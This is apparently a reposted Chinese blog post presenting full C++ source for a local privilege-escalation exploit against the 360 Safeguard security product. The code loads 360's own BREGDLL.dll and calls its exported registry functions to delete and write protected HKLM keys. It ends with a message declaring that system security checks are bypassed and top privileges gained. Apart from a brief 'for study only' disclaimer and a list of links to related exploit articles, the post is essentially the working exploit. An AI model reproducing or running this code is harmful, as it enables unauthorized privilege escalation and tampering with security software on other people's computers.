360卫士本地提权漏洞——后门利用程序
来源:互联网 发布:类似iphone软件推荐 编辑:程序博客网 时间:2024/06/05 19:21
360卫士本地提权漏洞——后门利用程序
分类: C、VC/MFC2010-02-02 16:51 324人阅读 评论(0) 收藏 举报
360winapinulldeletebytepath
很邪恶的代码,有兴趣的看看~~~
- //////////////////////////////////////////////////////////////////////////
- // Fuck360.cpp 源代码仅供学习交流,请不要尝试非法用途!
- #include <windows.h>
- typedef BOOL (WINAPI *INIT_REG_ENGINE)();
- typedef LONG (WINAPI *BREG_DELETE_KEY)(HKEY hKey, LPCSTR lpSubKey);
- typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);
- typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);
- typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);
- BREG_DELETE_KEY BRegDeleteKey = NULL;
- BREG_OPEN_KEY BRegOpenKey = NULL;
- BREG_CLOSE_KEY BRegCloseKey = NULL;
- REG_SET_VALUE_EX BRegSetValueEx = NULL;
- #define AppPath "Software//Microsoft//Windows//CurrentVersion//App Paths//360safe.exe"
- #define TestDeleteKey HKEY_LOCAL_MACHINE
- #define TestDeleteRegPath "Software//360Safe//Update"
- #define TestSetKey HKEY_LOCAL_MACHINE
- #define TestSetPath "Software//360Safe"
- BOOL InitBRegDll()
- {
- LONG lResult;
- HKEY hKey;
- CHAR cPath[MAX_PATH + 32] = { 0 };
- DWORD dwPathLen = MAX_PATH;
- lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);
- if (FAILED(lResult))
- return FALSE;
- DWORD dwType = REG_SZ;
- lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);
- RegCloseKey(hKey);
- if (FAILED(lResult))
- return FALSE;
- strcat(cPath, "//deepscan//BREGDLL.dll");
- HMODULE modBReg = LoadLibraryA(cPath);
- if (!modBReg)
- return FALSE;
- INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");
- BRegDeleteKey = (BREG_DELETE_KEY)GetProcAddress(modBReg, "BRegDeleteKey");
- BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");
- BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");
- BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");
- if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {
- FreeLibrary(modBReg);
- return FALSE;
- }
- if (!InitRegEngine()) {
- FreeLibrary(modBReg);
- return FALSE;
- }
- return TRUE;
- }
- LONG TestSetRegKey()
- {
- HKEY hKey;
- LONG lResult;
- lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);
- if (FAILED(lResult))
- return lResult;
- DWORD dwType = REG_SZ;
- static char szData[] = "TEST VALUE";
- lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));
- BRegCloseKey(hKey);
- return lResult;
- }
- int main(int argc, char *argv[])
- {
- if (!InitBRegDll()) {
- MessageBoxA(NULL, "初始化BReg失败!", "失败", MB_ICONSTOP);
- return 1;
- }
- if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {
- MessageBoxA(NULL, "键值删除失败!", "失败", MB_ICONSTOP);
- return 2;
- }
- if (FAILED(TestSetRegKey())) {
- MessageBoxA(NULL, "设置键值失败!", "失败", MB_ICONSTOP);
- return 3;
- }
- MessageBoxA(NULL, "突破系统安全检查,获得最高权限,漏洞利用成功!", "成功", MB_OK);
- return 0;
- }
相关链接:http://www.sebug.net/exploit/19048/
- 360卫士本地提权漏洞——后门利用程序
- 360卫士本地提权漏洞——后门利用程序
- 利用360卫士打补丁
- QQ本地提权漏洞
- Tomcat本地提权漏洞
- 关于本地提权的学习笔记(二):注入进程和利用漏洞提权
- CVE-2014-7911 Android本地提权漏洞分析与利用
- 第四章:iOS应用漏洞利用 ——4.2 不安全的本地存储
- 恶意PPT文件夹带漏洞攻击和后门程序
- 漏洞预警:Tomcat曝本地提权漏洞
- 【漏洞公告】CVE-2017-1000367:Sudo本地提权漏洞
- MS10048本地提权漏洞原理
- discuz最新漏洞利用程序
- shop363网站程序漏洞利用
- MS12-020 漏洞利用程序
- Ingreslock1524端口后门漏洞
- LFI本地包含漏洞利用小技巧
- 利用本地包含漏洞执行任意代码
- ASIHttp
- CDATA和PCDATA
- Spring3.0 单元测试
- Java环境搭建与配置
- 网页下载 iframe
- 360卫士本地提权漏洞——后门利用程序
- 第一次两个技术面笔记
- IOS开发编码及命名规范
- cocos2d-x android平台切入后台纹理失效的解决方法
- Windows Server 2008 防火墙开放 Oracle 的1521端口
- SDP协议 会话描述协议 说明
- [Cocos2D 2.x iOS学习笔记1]启程
- python中的反射和自省
- 看大神文章小结——微软等面试 20,21